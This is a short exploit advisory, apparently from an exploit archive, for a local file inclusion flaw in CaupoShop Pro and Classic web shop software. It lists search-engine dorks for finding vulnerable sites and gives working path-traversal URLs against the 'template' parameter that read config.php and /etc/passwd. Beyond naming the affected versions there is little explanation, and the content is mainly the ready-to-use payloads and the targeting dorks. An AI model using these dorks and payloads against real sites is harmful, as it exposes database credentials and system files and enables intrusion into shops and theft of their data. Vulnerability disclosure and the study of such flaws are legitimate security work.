CaupoShop Pro (2.x/ <= 3.70) Classic 3.01 Local File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : CaupoShop Pro (2.x/ <= 3.70) Classic 3.01 Local File Include Vulnerability
# Published : 2011-11-02
# Author :
# Previous Title : aidiCMS v3.55 (ajax_create_folder.php) Remote Code Execution
# Next Title : phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution

CaupoShop Pro (2.x/ <= 3.70) Local File Include Vulnerability
-----------------------------------------------------------------------------------------
# Vuln Softwares :     	CaupoShop Pro 2.x
	     	CaupoShop Classic 3.01 
	     	CaupoShop Pro 3.70
# Discovered By :	 Rami Salama
#Contact :		eng.ramisalama_[at]_gmail_[dot]_com
# Vendor  : 	http://www.caupo.net
# Greets To : 	All my colleagues and friends in MCIT scholarship at Raya Academy
#Dorks : 		"powered by CaupoShop"
	  	 inurl:index.php?action=template&template

#Exploit  : 		http://127.0.0.1/[CaupoShop]/index.php?action=template&template=[LFI]
#POC :		http://127.0.0.1/[CaupoShop]/index.php?action=template&template=../../../config.php
	  	http://127.0.0.1/[CaupoShop]/index.php?action=template&template=../../../../../../etc/passwd

#28 October 2011 - Egypt